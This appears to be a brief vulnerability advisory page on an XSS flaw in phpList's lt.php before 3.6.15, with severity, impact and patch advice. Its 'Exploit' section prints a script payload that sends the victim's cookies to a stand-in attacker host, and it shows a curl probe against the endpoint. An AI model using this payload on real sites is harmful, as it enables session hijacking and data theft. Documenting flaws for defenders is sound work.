Listen to this Post
How the CVE Works
CVE-2025-28074 affects phpList versions before 3.6.15. The vulnerability arises in `lt.php` due to improper sanitization of user-supplied input. When the application processes untrusted data in dynamically generated paths, an attacker can inject malicious JavaScript payloads. This leads to stored or reflected XSS, where the script executes in the victim’s browser, potentially hijacking sessions, defacing pages, or stealing sensitive data.
DailyCVE Form
Platform: phpList
Version: < 3.6.15
Vulnerability: XSS
Severity: Medium
Date: 06/16/2025
Prediction: Patch by 07/15/2025
What Undercode Say
Analytics
grep -r "lt.php" /var/www/phplist curl -X POST -d "payload=<script>alert(1)</script>" http://target/lt.php
Exploit
<script>document.location='http://attacker/steal.php?cookie='+document.cookie</script>
Protection from this CVE
Update to phpList 3.6.15
Sanitize input in `lt.php`
Use CSP headers
Impact
Session hijacking
Data theft
UI manipulation
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
